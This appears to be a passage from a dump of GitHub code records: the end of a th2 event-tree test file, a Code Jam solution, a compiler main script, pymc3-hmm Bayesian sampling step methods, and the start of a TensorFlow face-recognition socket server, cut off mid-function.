\"Broken_Event\",\n \"successful\": None,\n \"isBatched\": None,\n }\n events: list = [event for event in events] + [broken_event]\n\n before_tree = len(events)\n collection = EventsTreeCollectionProvider5(events, data_source=data_source, stub=True)\n after_tree = len(collection)\n\n assert collection.detached_events == {\"Broken_Event\": [broken_event]} and before_tree != after_tree\n\n\n@pytest.mark.skip\ndef test_preserve_body():\n data_source = HTTPProvider5DataSource(\"http://10.100.66.114:31787/\")\n events: Data = data_source.command(\n GetEvents(\n start_timestamp=datetime(year=2022, month=6, day=30, hour=14, minute=0, second=0, microsecond=0),\n end_timestamp=datetime(year=2022, month=6, day=30, hour=15, minute=0, second=0, microsecond=0),\n )\n )\n\n collection = EventsTreeCollectionProvider5(events, data_source=data_source, preserve_body=True)\n\n assert all(\n [True if event.get(\"body\") is not None else False for event in collection.get_trees()[0].get_all_events()]\n )\n\n\n@pytest.mark.skip\ndef test_create_subtree_incoming_data_stream():\n data_source = HTTPProvider5DataSource(\"http://10.100.66.114:31787/\")\n events: Data = data_source.command(\n GetEvents(\n start_timestamp=datetime(year=2022, month=6, day=30, hour=14, minute=0, second=0, microsecond=0),\n end_timestamp=datetime(year=2022, month=6, day=30, hour=15, minute=0, second=0, microsecond=0),\n )\n )\n tree = EventsTreeCollectionProvider5(events, preserve_body=True).get_trees()[0]\n etc_1 = EventsTreeCollectionProvider5(tree.findall(lambda e: e[\"eventName\"]), preserve_body=True)\n sub_tree_0 = etc_1.get_trees()[0]\n root_sub_tree_0 = sub_tree_0.get_root().copy()\n etc_2 = EventsTreeCollectionProvider5(tree.findall(lambda e: e[\"eventName\"]))\n assert root_sub_tree_0 != etc_2.get_trees()[0]\n assert root_sub_tree_0 == sub_tree_0.get_root()\n assert (\n root_sub_tree_0.get(\"body\") == [{\"data\": \"Root event\", \"type\": \"message\"}]\n and etc_2.get_trees()[0].get_root().get(\"body\") is None\n )\n","repo_name":"th2-net/th2-data-services","sub_path":"tests/tests_unit/tests_diff_version/tests_v5/tests_events_tree/test_events_tree_local.py","file_name":"test_events_tree_local.py","file_ext":"py","file_size_in_byte":4594,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"23409538351","text":"#-*- coding:utf-8 -*-\r\n'''\r\nCreated on 2014年4月12日\r\n\r\n@author: wilbur\r\n'''\r\nimport string\r\n\r\n\r\n\r\n\r\ndef getCommon(listA,listB):\r\n counter =[]\r\n for i in listA:\r\n if i in listB:\r\n counter.append(i)\r\n return counter\r\n\r\nf=open(r'F:A-small-attempt0.in')\r\nfw=open(r'F:\\A-small.out','w')\r\ncaseNum=string.atoi(f.readline()) \r\n\r\n\r\n\r\n \r\n#测试caseNum个case\r\nfor i in range(caseNum): \r\n rowNOA=string.atoi(f.readline()) \r\n listA=[]\r\n for j in range(4):\r\n temp = f.readline().strip().split()\r\n listA.append(temp) \r\n rowNOB=string.atoi(f.readline()) \r\n \r\n listB=[]\r\n for k in range(4):\r\n temp = f.readline().strip().split()\r\n listB.append(temp) \r\n \r\n common= getCommon(listA[rowNOA-1],listB[rowNOB-1])\r\n \r\n if len(common)==0:\r\n fw.write('Case #{}: Volunteer cheated!\\n'.format(i+1))\r\n elif len(common)==1:\r\n fw.write('Case #{0}: {1}\\n'.format(i+1,common[0]))\r\n else:\r\n fw.write('Case #{}: Bad magician!\\n'.format(i+1))\r\n \r\nf.close()\r\nfw.close()","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_135/1022.py","file_name":"1022.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74920329794","text":"from scanner.scanner import Scanenr\nfrom parsr.grammar import Grammar\nfrom parsr.initialize import Initializer\nfrom parsr.parser import Parser\nfrom Symbols.symbol_table import SymbolTable , Token , TokenType\nfrom codegen.codegen import CodeGen\n\n################### parser output is in report/parser #################################################\n# amirmahdi hosseinabadi 97110069\n# amirhossein alimohammadi 97110166\n\n\n\n\ninitialize = Initializer()\ng = Grammar('parsr/', initialize)\nparse_table = g.get_parse_table()\nsymbol = SymbolTable()\nsymbol.add_symbol(Token(TokenType.ID, \"output\"))\nsymbol.fetch(\"output\").address = 5\nscannar1 = Scanenr(\"input.txt\", symbol)\ncodegen = CodeGen(scannar1.fw.symbol_tables)\np = Parser(scannar1, parse_table, initialize, codegen)\ncodegen.end_code()\ncodegen.semantic_analyser.writer()\nif len(codegen.semantic_analyser.errors) > 0 :\n codegen.output_writer()\n\n\ndef pretty(d, indent=0):\n for key, value in d.items():\n print('\\t' * indent + str(key))\n if isinstance(value, dict):\n pretty(value, indent + 1)\n else:\n print('\\t' * (indent + 1) + str(value))\n\n# print(symbol.symbol_table)\n# print(symbol.IDs)","repo_name":"alimohammadiamirhossein/cminus","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18971928681","text":"from functools import singledispatch\nfrom itertools import chain\nfrom typing import Callable, Tuple\n\nimport numpy as np\nimport pymc3 as pm\nimport scipy\nimport theano.scalar as ts\nimport theano.tensor as tt\nfrom pymc3.distributions.distribution import draw_values\nfrom pymc3.step_methods.arraystep import ArrayStep, BlockedStep, Competence\nfrom pymc3.util import get_untransformed_name\nfrom scipy.stats import invgamma\nfrom theano import config\nfrom theano.compile import optdb\nfrom theano.graph.basic import Variable, graph_inputs\nfrom theano.graph.fg import FunctionGraph\nfrom theano.graph.op import get_test_value as test_value\nfrom theano.graph.opt import OpRemove, pre_greedy_local_optimizer\nfrom theano.graph.optdb import Query\nfrom theano.sparse.basic import StructuredDot\nfrom theano.tensor.basic import Dot\nfrom theano.tensor.elemwise import DimShuffle, Elemwise\nfrom theano.tensor.subtensor import AdvancedIncSubtensor1\nfrom theano.tensor.var import TensorConstant\n\nfrom pymc3_hmm.distributions import DiscreteMarkovChain, HorseShoe, SwitchingProcess\nfrom pymc3_hmm.utils import compute_trans_freqs\n\nbig: float = 1e20\nsmall: float = 1.0 / big\n\n\ndef ffbs_step(\n gamma_0: np.ndarray,\n Gammas: np.ndarray,\n log_lik: np.ndarray,\n alphas: np.ndarray,\n out: np.ndarray,\n):\n \"\"\"Sample a forward-filtered backward-sampled (FFBS) state sequence.\n\n Parameters\n ----------\n gamma_0\n The initial state probabilities.\n Gamma\n The transition probability matrices. This array should take the shape\n ``(N, M, M)``, where ``N`` is the state sequence length and ``M`` is\n the number of distinct states. If ``N`` is ``1``, the single\n transition matrix will broadcast across all elements of the state\n sequence.\n log_lik\n An array of shape `(M, N)` consisting of the log-likelihood values for\n each state value at each point in the sequence.\n alphas\n An array in which to store the forward probabilities.\n out\n An output array to be updated in-place with the posterior sample\n states.\n\n \"\"\"\n # Number of observations\n N: int = log_lik.shape[-1]\n\n # Number of states\n M: int = gamma_0.shape[-1]\n # assert M == log_lik.shape[-2]\n\n # Initial state probabilities\n gamma_0_normed: np.ndarray = gamma_0.copy()\n gamma_0_normed /= np.sum(gamma_0)\n\n # Previous forward probability\n alpha_nm1: np.ndarray = gamma_0_normed\n\n # Make sure we have a transition matrix for each element in a state\n # sequence\n Gamma: np.ndarray = np.broadcast_to(Gammas, (N,) + Gammas.shape[-2:])\n\n lik_n: np.ndarray = np.empty((M,), dtype=float)\n alpha_n: np.ndarray = np.empty((M,), dtype=float)\n\n # Forward filtering\n for n in range(N):\n log_lik_n: np.ndarray = log_lik[..., n]\n np.exp(log_lik_n - log_lik_n.max(), out=lik_n)\n np.dot(alpha_nm1, Gamma[n], out=alpha_n)\n alpha_n *= lik_n\n alpha_n_sum: float = np.sum(alpha_n)\n\n # Rescale small values\n if alpha_n_sum < small:\n alpha_n *= big\n\n alpha_nm1 = alpha_n\n alphas[..., n] = alpha_n\n\n # The uniform samples used to sample the categorical states\n unif_samples: np.ndarray = np.random.uniform(size=out.shape)\n\n alpha_N: np.ndarray = alphas[..., N - 1]\n beta_N: np.ndarray = alpha_N / alpha_N.sum()\n\n state_np1: np.ndarray = np.searchsorted(beta_N.cumsum(), unif_samples[N - 1])\n\n out[N - 1] = state_np1\n\n beta_n: np.ndarray = np.empty((M,), dtype=float)\n\n # Backward sampling\n for n in range(N - 2, -1, -1):\n np.multiply(alphas[..., n], Gamma[n + 1, :, state_np1], out=beta_n)\n beta_n /= np.sum(beta_n)\n\n state_np1 = np.searchsorted(beta_n.cumsum(), unif_samples[n])\n out[n] = state_np1\n\n return out\n\n\nclass FFBSStep(BlockedStep):\n r\"\"\"Forward-filtering backward-sampling steps.\n\n For a hidden Markov model with state sequence :math:`S_t`, observations\n :math:`y_t`, and parameters :math:`\\theta`, this step method samples\n\n .. math::\n\n S_T &\\sim \\operatorname{P}\\left( S_T \\mid y_{1:T}, \\theta \\right)\n \\\\\n S_t \\mid S_{t+1} &\\sim \\operatorname{P}\\left( S_{t+1} \\mid S_t, \\theta \\right)\n \\operatorname{P}\\left( S_{t+1} \\mid y_{1:T}, \\theta \\right)\n\n \"\"\"\n\n name = \"ffbs\"\n\n def __init__(self, vars, values=None, model=None):\n\n if len(vars) > 1:\n raise ValueError(\"This sampler only takes one variable.\")\n\n (var,) = pm.inputvars(vars)\n\n if not isinstance(var.distribution, DiscreteMarkovChain):\n raise TypeError(\"This sampler only samples `DiscreteMarkovChain`s.\")\n\n model = pm.modelcontext(model)\n\n self.vars = [var]\n\n self.dependent_rvs = [\n v\n for v in model.basic_RVs\n if v is not var and var in graph_inputs([v.logpt])\n ]\n\n dep_comps_logp_stacked = []\n for i, dependent_rv in enumerate(self.dependent_rvs):\n if isinstance(dependent_rv.distribution, SwitchingProcess):\n comp_logps = []\n\n # Get the log-likelihoood sequences for each state in this\n # `SwitchingProcess` observations distribution\n for comp_dist in dependent_rv.distribution.comp_dists:\n comp_logps.append(comp_dist.logp(dependent_rv))\n\n comp_logp_stacked = tt.stack(comp_logps)\n else:\n raise TypeError(\n \"This sampler only supports `SwitchingProcess` observations\"\n )\n\n dep_comps_logp_stacked.append(comp_logp_stacked)\n\n comp_logp_stacked = tt.sum(dep_comps_logp_stacked, axis=0)\n\n (M,) = draw_values([var.distribution.gamma_0.shape[-1]], point=model.test_point)\n N = model.test_point[var.name].shape[-1]\n self.alphas = np.empty((M, N), dtype=float)\n\n self.log_lik_states = model.fn(comp_logp_stacked)\n self.gamma_0_fn = model.fn(var.distribution.gamma_0)\n self.Gammas_fn = model.fn(var.distribution.Gammas)\n\n def step(self, point):\n gamma_0 = self.gamma_0_fn(point)\n # TODO: Can we update these in-place (e.g. using a shared variable)?\n Gammas_t = self.Gammas_fn(point)\n # TODO: Can we update these in-place (e.g. using a shared variable)?\n log_lik_state_vals = self.log_lik_states(point)\n ffbs_step(\n gamma_0, Gammas_t, log_lik_state_vals, self.alphas, point[self.vars[0].name]\n )\n return point\n\n @staticmethod\n def competence(var):\n distribution = getattr(var.distribution, \"parent_dist\", var.distribution)\n\n if isinstance(distribution, DiscreteMarkovChain):\n return Competence.IDEAL\n # elif isinstance(distribution, pm.Bernoulli) or (var.dtype in pm.bool_types):\n # return Competence.COMPATIBLE\n\n return Competence.INCOMPATIBLE\n\n\nclass TransMatConjugateStep(ArrayStep):\n r\"\"\"Conjugate update steps for a transition matrix with Dirichlet distributed rows conditioned on a state sequence.\n\n For a hidden Markov model given by\n\n .. math::\n\n \\Gamma_k &\\sim \\operatorname{Dir}\\left( \\alpha_k \\right),\n \\quad k \\in \\{1, \\dots, M\\} \\; \\text{and} \\;\n \\alpha_k \\in \\mathbb{R}^{M}, \\; \\Gamma_k \\in \\mathbb{R}^{M \\times M}\n \\\\\n S_t &\\sim \\operatorname{Cat}\\left( \\Gamma^\\top \\pi_t \\right)\n\n this step method samples\n\n .. math::\n\n \\Gamma_j &\\sim \\operatorname{P}\\left( \\Gamma_j \\mid S_{1:T}, y_{1:T} \\right)\n \\\\\n &\\sim \\operatorname{Dir}\\left( \\alpha_j + N_j \\right)\n\n\n where :math:`N_j \\in \\mathbb{R}^{M}` are counts of observed state\n transitions :math:`j \\to k` for :math:`k \\in \\{1, \\dots, K\\}` conditional\n on :math:`S_{1:T}`.\n\n Dirichlet priors can also be embedded in larger transition matrices through\n `theano.tensor.set_subtensor` `Op`s. See\n `TransMatConjugateStep._set_row_mappings`.\n\n \"\"\" # noqa: E501\n\n name = \"trans-mat-conjugate\"\n\n def __init__(self, model_vars, values=None, model=None, rng=None):\n \"\"\"Initialize a `TransMatConjugateStep` object.\"\"\"\n\n model = pm.modelcontext(model)\n\n if isinstance(model_vars, Variable):\n model_vars = [model_vars]\n\n model_vars = list(chain.from_iterable([pm.inputvars(v) for v in model_vars]))\n\n # TODO: Are the rows in this matrix our `dir_priors`?\n dir_priors = []\n self.dir_priors_untrans = []\n for d in model_vars:\n untrans_var = model.named_vars[get_untransformed_name(d.name)]\n if isinstance(untrans_var.distribution, pm.Dirichlet):\n self.dir_priors_untrans.append(untrans_var)\n dir_priors.append(d)\n\n state_seqs = [\n v\n for v in model.vars + model.observed_RVs\n if isinstance(v.distribution, DiscreteMarkovChain)\n and all(d in graph_inputs([v.distribution.Gammas]) for d in dir_priors)\n ]\n\n if not self.dir_priors_untrans or not len(state_seqs) == 1:\n raise ValueError(\n \"This step method requires a set of Dirichlet priors\"\n \" that comprise a single transition matrix\"\n )\n\n (state_seq,) = state_seqs\n\n Gamma = state_seq.distribution.Gammas\n\n self._set_row_mappings(Gamma, dir_priors, model)\n\n if len(self.row_remaps) != len(dir_priors):\n raise TypeError(\n \"The Dirichlet priors could not be found\"\n \" in the graph for {}\".format(state_seq.distribution.Gammas)\n )\n\n if state_seq in model.observed_RVs:\n self.state_seq_obs = np.asarray(state_seq.distribution.data)\n\n self.rng = rng\n self.dists = list(dir_priors)\n self.state_seq_name = state_seq.name\n\n super().__init__(dir_priors, [], allvars=True)\n\n def _set_row_mappings(self, Gamma, dir_priors, model):\n \"\"\"Create maps from Dirichlet priors parameters to rows and slices in the transition matrix.\n\n These maps are needed when a transition matrix isn't simply comprised\n of Dirichlet prior rows, but--instead--slices of Dirichlet priors.\n\n Consider the following:\n\n .. code-block:: python\n\n with pm.Model():\n d_0_rv = pm.Dirichlet(\"p_0\", np.r_[1, 1])\n d_1_rv = pm.Dirichlet(\"p_1\", np.r_[1, 1])\n\n p_0_rv = tt.as_tensor([0, 0, 1])\n p_1_rv = tt.zeros(3)\n p_1_rv = tt.set_subtensor(p_0_rv[[0, 2]], d_0_rv)\n p_2_rv = tt.zeros(3)\n p_2_rv = tt.set_subtensor(p_1_rv[[1, 2]], d_1_rv)\n\n P_tt = tt.stack([p_0_rv, p_1_rv, p_2_rv])\n\n The transition matrix `P_tt` has Dirichlet priors in only two of its\n three rows, and--even then--they're only present in parts of two rows.\n\n In this example, we need to know that Dirichlet prior 0, i.e. `d_0_rv`,\n is mapped to row 1, and prior 1 is mapped to row 2. Furthermore, we\n need to know that prior 0 fills columns 0 and 2 in row 1, and prior 1\n fills columns 1 and 2 in row 2.\n\n These mappings allow one to embed Dirichlet priors in larger transition\n matrices with--for instance--fixed transition behavior.\n\n \"\"\" # noqa: E501\n\n # Remove unimportant `Op`s from the transition matrix graph\n Gamma = pre_greedy_local_optimizer(\n FunctionGraph([], []),\n [\n OpRemove(Elemwise(ts.Cast(ts.float32))),\n OpRemove(Elemwise(ts.Cast(ts.float64))),\n OpRemove(Elemwise(ts.identity)),\n ],\n Gamma,\n )\n\n # Canonicalize the transition matrix graph\n fg = FunctionGraph(\n list(graph_inputs([Gamma] + self.dir_priors_untrans)),\n [Gamma] + self.dir_priors_untrans,\n clone=True,\n )\n canonicalize_opt = optdb.query(Query(include=[\"canonicalize\"]))\n canonicalize_opt.optimize(fg)\n Gamma = fg.outputs[0]\n dir_priors_untrans = fg.outputs[1:]\n fg.disown()\n\n Gamma_DimShuffle = Gamma.owner\n\n if not (isinstance(Gamma_DimShuffle.op, DimShuffle)):\n raise TypeError(\"The transition matrix should be non-time-varying\")\n\n Gamma_Join = Gamma_DimShuffle.inputs[0].owner\n\n if not (isinstance(Gamma_Join.op, tt.basic.Join)):\n raise TypeError(\n \"The transition matrix should be comprised of stacked row vectors\"\n )\n\n Gamma_rows = Gamma_Join.inputs[1:]\n\n self.n_rows = len(Gamma_rows)\n\n # Loop through the rows in the transition matrix's graph and determine\n # how our transformed Dirichlet RVs map to this transition matrix.\n self.row_remaps = {}\n self.row_slices = {}\n for i, dim_row in enumerate(Gamma_rows):\n if not dim_row.owner:\n continue\n\n # By-pass the `DimShuffle`s applied to the `AdvancedIncSubtensor1`\n # `Op`s in which we're actually interested\n gamma_row = dim_row.owner.inputs[0]\n\n if gamma_row in dir_priors_untrans:\n # This is a row that's simply a `Dirichlet`\n j = dir_priors_untrans.index(gamma_row)\n self.row_remaps[j] = i\n self.row_slices[j] = slice(None)\n\n if gamma_row.owner.inputs[1] not in dir_priors_untrans:\n continue\n\n # Parts of a row set by a `*Subtensor*` `Op` using a full\n # `Dirichlet` e.g. `P_row[idx] = dir_rv`\n j = dir_priors_untrans.index(gamma_row.owner.inputs[1])\n untrans_dirich = dir_priors_untrans[j]\n\n if (\n gamma_row.owner\n and isinstance(gamma_row.owner.op, AdvancedIncSubtensor1)\n and gamma_row.owner.inputs[1] == untrans_dirich\n ):\n self.row_remaps[j] = i\n\n rhand_val = gamma_row.owner.inputs[2]\n if not isinstance(rhand_val, TensorConstant):\n # TODO: We could allow more types of `idx` (e.g. slices)\n # Currently, `idx` can't be something like `2:5`\n raise TypeError(\n \"Only array indexing allowed for mixed\"\n \" Dirichlet/non-Dirichlet rows\"\n )\n self.row_slices[j] = rhand_val.data\n\n def astep(self, point, inputs):\n\n states = getattr(self, \"state_seq_obs\", None)\n if states is None:\n states = inputs[self.state_seq_name]\n\n N_mat = compute_trans_freqs(states, self.n_rows, counts_only=True)\n\n trans_res = [\n d.distribution.dist.transform.forward_val(\n np.random.dirichlet(\n test_value(d.distribution.dist.a)\n + N_mat[self.row_remaps[i]][self.row_slices[i]]\n )\n )\n for i, d in enumerate(self.dists)\n ]\n\n sample = np.stack(trans_res, 1)\n\n return sample.reshape(point.shape)\n\n @staticmethod\n def competence(var):\n\n # TODO: Check that the dependent term is a conjugate type.\n\n distribution = getattr(var.distribution, \"parent_dist\", var.distribution)\n\n if isinstance(distribution, pm.Dirichlet):\n return Competence.COMPATIBLE\n\n return Competence.INCOMPATIBLE\n\n\ndef large_p_mvnormal_sampler(D_diag, Phi, a):\n r\"\"\"Efficiently sample from a large multivariate normal.\n\n This function draws samples from the following distribution:\n\n .. math::\n \\beta \\sim \\operatorname{N}\\left( \\mu, \\Sigma \\right)\n\n where\n\n .. math::\n \\mu = \\Sigma \\Phi^\\top a, \\\\\n \\Sigma = \\left( \\Phi^\\top \\Phi + D^{-1} \\right)^{-1}\n\n and :math:`a \\in \\mathbb{R}^{n}`, :math:`\\Phi \\in \\mathbb{R}^{n \\times p}`.\n\n This approach is particularly effective when :math:`p \\gg n`.\n\n From \"Fast sampling with Gaussian scale-mixture priors in high-dimensional\n regression\", Bhattacharya, Chakraborty, and Mallick, 2015.\n\n \"\"\"\n N = a.shape[0]\n u = np.random.normal(0, np.sqrt(D_diag))\n delta = np.random.normal(size=N)\n if scipy.sparse.issparse(Phi):\n Phi_D = Phi.multiply(D_diag)\n v = Phi * u + delta\n Z = (Phi_D * Phi.T + scipy.sparse.eye(N)).toarray()\n w = scipy.linalg.solve(Z, a - v, assume_a=\"sym\")\n beta = u + Phi_D.T * w\n else:\n Phi_D = Phi * D_diag\n v = Phi.dot(u) + delta\n Z = Phi_D.dot(Phi.T)\n Z.flat[:: N + 1] += 1\n w = scipy.linalg.solve(Z, a - v, assume_a=\"sym\")\n beta = u + Phi_D.T @ w\n return beta\n\n\ndef hs_step(\n lambda2: np.ndarray,\n tau2: np.ndarray,\n vi: np.ndarray,\n xi: np.ndarray,\n X: np.ndarray,\n y: np.ndarray,\n):\n _, M = X.shape\n\n D_diag = tau2 * lambda2\n beta = large_p_mvnormal_sampler(D_diag, X, y)\n beta2 = beta ** 2\n\n lambda2 = invgamma(a=1, scale=1 / vi + beta2 / (2 * tau2)).rvs()\n tau2 = invgamma(a=(M + 1) / 2, scale=1 / xi + (beta2 / lambda2).sum() / 2).rvs()\n vi = invgamma(a=1, scale=1 + 1 / lambda2).rvs()\n xi = invgamma(a=1, scale=1 + 1 / tau2).rvs()\n\n return beta, lambda2, tau2, vi, xi\n\n\n@singledispatch\ndef hs_regression_model(dist: pm.Distribution, rv, model) -> Tuple[Callable, Variable]:\n \"\"\"Determine the normal regression model for a Horseshoe sampler.\n\n Return a function that computes the normal regression: i.e. the observation\n vector and regression matrix.\n\n For non-normal distributions, the normal regression model is an\n approximation (e.g. Polya-Gamma).\n \"\"\" # noqa: E501\n raise NotImplementedError()\n\n\n@hs_regression_model.register(pm.Normal)\ndef hs_regression_model_Normal(dist, rv, model):\n mu = dist.mu\n y_X_fn = None\n if hasattr(rv, \"observations\"):\n obs = tt.as_tensor_variable(rv.observations)\n obs_fn = model.fn(obs)\n\n def y_X_fn(points, X):\n return obs_fn(points), X\n\n return y_X_fn, mu\n\n\n@hs_regression_model.register(pm.NegativeBinomial)\ndef hs_regression_model_NegativeBinomial(dist, rv, model):\n\n mu = tt.as_tensor_variable(dist.mu)\n\n if mu.owner and mu.owner.op == tt.exp:\n eta = mu.owner.inputs[0]\n else:\n eta = mu\n\n alpha = tt.as_tensor_variable(dist.alpha)\n if hasattr(rv, \"observations\"):\n from polyagamma import random_polyagamma\n\n obs = tt.as_tensor_variable(rv.observations)\n h_z_alpha_fn = model.fn(\n [\n alpha + obs,\n eta.squeeze() - tt.log(alpha),\n alpha,\n obs,\n ]\n )\n\n def y_X_fn(points, X):\n h, z, alpha, obs = h_z_alpha_fn(points)\n\n omega = random_polyagamma(h, z)\n\n V_diag_inv = np.abs(omega)\n sigma2 = 1 / V_diag_inv\n sigma = np.sqrt(sigma2)\n\n if scipy.sparse.issparse(X):\n Phi = (X.T.multiply(np.sqrt(V_diag_inv))).T\n else:\n Phi = (X.T * np.sqrt(V_diag_inv)).T\n\n y_aug = np.log(alpha) + (obs - alpha) / (2.0 * omega)\n y_aug = (y_aug / sigma).astype(config.floatX)\n return y_aug, Phi\n\n return y_X_fn, eta\n\n return None, eta\n\n\ndef find_dot(node, beta, model, y_fn):\n if not node.owner:\n return\n # dense dot\n if isinstance(node.owner.op, Dot):\n if beta in node.owner.inputs:\n X_fn = model.fn(node.owner.inputs[1].T)\n return node, X_fn, y_fn\n # sprase dot\n if isinstance(node.owner.op, StructuredDot):\n if beta in node.owner.inputs[1].owner.inputs:\n X_fn = model.fn(node.owner.inputs[0])\n return node, X_fn, y_fn\n else:\n # if exp transformation\n if isinstance(node.owner.op, tt.elemwise.Elemwise):\n res = find_dot(node.owner.inputs[0], beta, model, y_fn)\n if res:\n node, X_fn, _ = res\n return node, X_fn, y_fn\n\n\nclass HSStep(BlockedStep):\n name = \"hsgibbs\"\n\n def __init__(self, vars, values=None, model=None):\n model = pm.modelcontext(model)\n\n if len(vars) > 1:\n raise ValueError(\"This sampler only takes one variable.\")\n\n (beta,) = pm.inputvars(vars)\n\n if not isinstance(beta.distribution, HorseShoe):\n raise TypeError(\"This sampler only samples `HorseShoe`s.\")\n\n other_model_vars = [\n value for attr, value in model.named_vars.items() if value != beta\n ]\n y_X_fn, X_fn = None, None\n\n for var in other_model_vars:\n # Look through all the attributes of the variable and see if any of\n # the parameters have a multiplication relationship with the\n # Horseshoe variable\n if hasattr(var, \"distribution\"):\n try:\n y_X_fn, eta = hs_regression_model(var.distribution, var, model)\n except NotImplementedError:\n continue\n elif isinstance(var, pm.model.DeterministicWrapper):\n eta = var.owner.inputs[0]\n if eta.owner:\n eta_X_fn = find_dot(eta, beta, model, y_X_fn)\n if not eta_X_fn:\n continue\n eta, X_fn, y_X_fn = eta_X_fn\n else:\n continue # pragma: no cover\n\n if not y_X_fn:\n # We don't have the observation distribution, so we need to\n # find it. This happens when a `Deterministic` bridges a\n # `Horseshoe` parameter with it's observation distribution's\n # mean.\n y_X_fn = None\n obs_mu = None\n for obs_rv in model.observed_RVs:\n try:\n y_X_fn, obs_mu = hs_regression_model(\n obs_rv.distribution, obs_rv, model\n )\n break\n except NotImplementedError:\n continue\n\n # The `Deterministic` should be the mean parameter of the\n # observed distribution\n if var != obs_mu:\n continue\n\n if not (X_fn and y_X_fn):\n raise NotImplementedError(\n f\"Cannot find a design matrix or dependent variable associated with {beta}\" # noqa: E501\n )\n\n self.vars = [beta]\n\n M = model.test_point[beta.name].shape[-1]\n\n # if observation dist is normal then y_aug_fn = y_fn when it is NB\n # then, hs_regression_model, dispatch i.distribution...\n self.vi = np.full(M, 1)\n self.lambda2 = np.full(M, 1)\n self.beta = np.full(M, 1)\n self.tau2 = 1\n self.xi = 1\n self.y_X_fn = y_X_fn\n self.X_fn = X_fn\n\n def step(self, point):\n X = self.X_fn(point)\n y, X = self.y_X_fn(point, X)\n self.beta, self.lambda2, self.tau2, self.vi, self.xi = hs_step(\n self.lambda2, self.tau2, self.vi, self.xi, X, y\n )\n point[self.vars[0].name] = self.beta\n return point\n","repo_name":"AmpersandTV/pymc3-hmm","sub_path":"pymc3_hmm/step_methods.py","file_name":"step_methods.py","file_ext":"py","file_size_in_byte":23220,"program_lang":"python","lang":"en","doc_type":"code","stars":93,"dataset":"github-code","pt":"61"} +{"seq_id":"12695771253","text":"import cv2\nimport numpy as np\nimport tensorflow as tf\nimport math\nfrom sklearn.decomposition import PCA\nimport os\nimport time\nimport glob\nimport face_detection.src.facenet as facenet\nimport face_detection.src.align.detect_face as detect_face\nfrom json_socket import Server\nimport msgpack\n\nBIND_IP = \"127.0.0.1\"\nBIND_PORT = 9879 \n\nclass FaceDetector:\n\n def __init__(self):\n self.socket = Server(BIND_IP, BIND_PORT)\n self.socket.accept()\n\n def load_model(self, pb_path, image_size=(160,160)):\n tf.compat.v1.reset_default_graph()\n\n single_image = tf.compat.v1.placeholder(tf.int32, (None, None, 3))\n float_image = tf.cast(single_image, tf.float32)\n float_image = float_image / 255\n batch_image = tf.expand_dims(float_image, 0)\n resized_image = tf.image.resize(batch_image, image_size)\n\n phase_train = tf.compat.v1.placeholder_with_default(False, shape=[])\n input_map = {'image_batch':resized_image, 'phase_train':phase_train}\n model = facenet.load_model(pb_path, input_map)\n\n embeddings = tf.compat.v1.get_default_graph().get_tensor_by_name(\"embeddings:0\")\n return single_image, embeddings\n\n\n def load_image(self, image_path):\n image = cv2.imread(image_path)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n return image\n\n\n def calc_distance(self, embedding1, embedding2):\n # Euclidian distance\n diff = np.subtract(embedding1, embedding2)\n dist = np.sum(np.square(diff),0)\n\n return dist\n\n\n def crop_faces(self, image, pnet, rnet, onet):\n minsize = 20 # minimum size of face\n threshold = [0.6, 0.7, 0.7] # three steps's threshold\n factor = 0.709 # scale factor\n\n margin = 44\n image_size = 160\n h,w,_ = np.shape(image)\n\n bounding_boxes, points = detect_face.detect_face(image, minsize, pnet, rnet, onet, threshold, factor)\n faces = []\n for box in bounding_boxes:\n box = np.int32(box)\n bb = np.zeros(4, dtype=np.int32)\n bb[0] = np.maximum(box[0]-margin/2, 0)\n bb[1] = np.maximum(box[1]-margin/2, 0)\n bb[2] = np.minimum(box[2]+margin/2, w)\n bb[3] = np.minimum(box[3]+margin/2, h)\n cropped = image[bb[1]:bb[3], bb[0]:bb[2],:]\n scaled = cv2.resize(cropped, (image_size, image_size), interpolation=cv2.INTER_LINEAR)\n\n faces.append(scaled)\n\n return faces, bounding_boxes\n\n def check_face(self):\n tf.compat.v1.reset_default_graph()\n \n model_path = os.path.dirname(os.path.abspath(__file__)) + \"/face_detection/models/20180402-114759.pb\"\n self.single_image, self.embeddings = self.load_model(model_path)\n\n self.sess = tf.compat.v1.Session()\n self.pnet, self.rnet, self.onet = detect_face.create_mtcnn(self.sess,None)\n\n path_me = glob.glob(os.path.dirname(os.path.abspath(__file__)) + \"/face_detection/data/faces/lsh/*\")\n embed_me = []\n\n for path in path_me:\n img = self.load_image(path)\n result = self.sess.run(self.embeddings, feed_dict={self.single_image:img})\n result = result[0]\n embed_me.append(result)\n\n embed_me = np.array(embed_me)\n\n path_other1 = glob.glob(os.path.dirname(os.path.abspath(__file__)) + \"/face_detection/data/faces/other1/*\")\n embed_other1 = []\n\n for path in path_other1:\n img = self.load_image(path)\n result = self.sess.run(self.embeddings, feed_dict={self.single_image:img})\n result = result[0]\n embed_other1.append(result)\n\n embed_other1 = np.array(embed_other1)\n\n path_other2 = glob.glob(os.path.dirname(os.path.abspath(__file__)) + \"/face_detection/data/faces/other2/*\")\n\n embed_other2 = []\n\n for path in path_other2:\n img = self.load_image(path)\n result = self.sess.run(self.embeddings, feed_dict={self.single_image:img})\n result = result[0]\n embed_other2.append(result)\n\n embed_other2 = np.array(embed_other2)\n\n\n def box_face(self, frame):\n tf.compat.v1.reset_default_graph()\n frame = np.array(frame)\n frame = frame.astype('float32')\n cv_frame = cv2.resize(frame,(400,225))\n\n image_frame = cv_frame.copy()\n faces, bounding_boxes = self.crop_faces(image_frame, self.pnet, self.rnet, self.onet)\n print(\"faces : \", faces)\n print(\"\\nboxed :\", bounding_boxes)\n for box in bounding_boxes:\n box = np.int32(box)\n \n p1 = [box[0], box[1]]\n p2 = [box[2], box[3]]\n result_frame = self.sess.run(self.embeddings, feed_dict={self.single_image:image_frame})\n result_frame = result_frame[0]\n\n # distance_th = 1.0\n\n # distance1 = self.calc_distance(embed_me[0], result_frame)\n # distance2 = self.calc_distance(embed_me[3], 